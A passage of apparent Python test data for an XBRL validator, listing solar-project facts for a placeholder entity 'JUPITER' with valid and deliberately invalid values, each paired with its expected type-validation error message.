"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.9",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.999",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.99",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:monetaryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Sample String",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:stringItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:stringItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:stringItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonthlyOperatingReportExceptionDescription",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0.0",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-0.01",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "100.01",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "http://www.google.com",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "https://www.google.com",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type xbrli:anyURIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type xbrli:anyURIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type xbrli:anyURIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Participant", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "5493006MHB84DD0ZWV18",
"aspects": {
"concept": "dei:LegalEntityIdentifier",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Participant", "value is not legal for type dei:legalEntityIdentifierItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "dei:LegalEntityIdentifier",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:ModuleShortCircuitCurrent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:electricCurrentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleShortCircuitCurrent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:InverterOutputRatedFrequency",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:frequencyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterOutputRatedFrequency",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:ExpectedInsolationAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "value is not legal for type num-us:insolationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ExpectedInsolationAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "value is out of range for type num-us:insolationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "101.01",
"aspects": {
"concept": "solar:ExpectedInsolationAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:SystemMinimumIrradianceThreshold",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num-us:irradianceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemMinimumIrradianceThreshold",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "SystemDeviceListing", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "33.33",
"aspects": {
"concept": "solar:TrackerAzimuth",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "SystemDeviceListing", "value is out of range for type num-us:planeAngleItemType", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "361.1",
"aspects": {
"concept": "solar:TrackerAzimuth",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "SystemDeviceListing", "value is not legal for type num-us:planeAngleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TrackerAzimuth",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:SiteBarometricPressure",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num-us:pressureItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteBarometricPressure",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "19.19",
"aspects": {
"concept": "solar:TrackerStowWindSpeed",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:speedItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TrackerStowWindSpeed",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModelAmbientTemperature",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num-us:temperatureItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModelAmbientTemperature",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:InverterInputMaximumVoltageDC",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:voltageItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterInputMaximumVoltageDC",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:SiteAcreage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num:areaItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteAcreage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:ExpectedEnergyAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num:energyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ExpectedEnergyAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleLength",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num:lengthItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleLength",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:InverterWeight",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num:massItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterWeight",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:BatteryInverterACPowerRating",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:powerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:BatteryInverterACPowerRating",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:WashingAndWasteQuantityOfWater",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type num:volumeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:WashingAndWasteQuantityOfWater",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Storage",
"aspects": {
"concept": "solar:SystemDERType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:DERItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemDERType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:DERItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemDERType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Preliminary",
"aspects": {
"concept": "solar:AmericanLandTitleAssociationSurveyStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:aLTASurveyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:AmericanLandTitleAssociationSurveyStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:aLTASurveyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:AmericanLandTitleAssociationSurveyStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "NiCad",
"aspects": {
"concept": "solar:BatteryStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:batteryChemistryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:BatteryStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:batteryChemistryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:BatteryStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "DC-Coupled",
"aspects": {
"concept": "solar:SystemBatteryConnection",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:batteryConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemBatteryConnection",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:batteryConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemBatteryConnection",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2.4.1 Hot summer continental climates",
"aspects": {
"concept": "solar:SiteClimateClassificationKoppen",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateClassificationKoppenItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteClimateClassificationKoppen",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateClassificationKoppenItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteClimateClassificationKoppen",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Mixed - Marine",
"aspects": {
"concept": "solar:SiteClimateZoneTypeANSI",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateZoneANSIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteClimateZoneTypeANSI",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateZoneANSIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteClimateZoneTypeANSI",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Modbus",
"aspects": {
"concept": "solar:DataAcquisitionSystemCommunicationProtocol",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:communicationProtocolItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:DataAcquisitionSystemCommunicationProtocol",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:communicationProtocolItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:DataAcquisitionSystemCommunicationProtocol",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "BatteryManagementSystemMember",
"aspects": {
"concept": "solar:TypeOfDevice",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:deviceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TypeOfDevice",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:deviceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:TypeOfDevice",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Distributed Generation",
"aspects": {
"concept": "solar:ProjectDistributedGenerationPortolioOrUtilityScale",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:distributedGenOrUtilityScaleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectDistributedGenerationPortolioOrUtilityScale",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:distributedGenOrUtilityScaleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectDistributedGenerationPortolioOrUtilityScale",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Final Approval",
"aspects": {
"concept": "solar:DivisionOfStateArchitectApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:divisionStateApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:DivisionOfStateArchitectApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:divisionStateApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:DivisionOfStateArchitectApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Moderate",
"aspects": {
"concept": "solar:ProjectRecentEventSeverityOfEvent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:eventSeverityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectRecentEventSeverityOfEvent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:eventSeverityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectRecentEventSeverityOfEvent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitUpfrontFeeStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:feeStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitUpfrontFeeStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:feeStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invald Value",
"aspects": {
"concept": "solar:ZoningPermitUpfrontFeeStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:FundStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:fundStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:FundStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:fundStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:FundStatus",
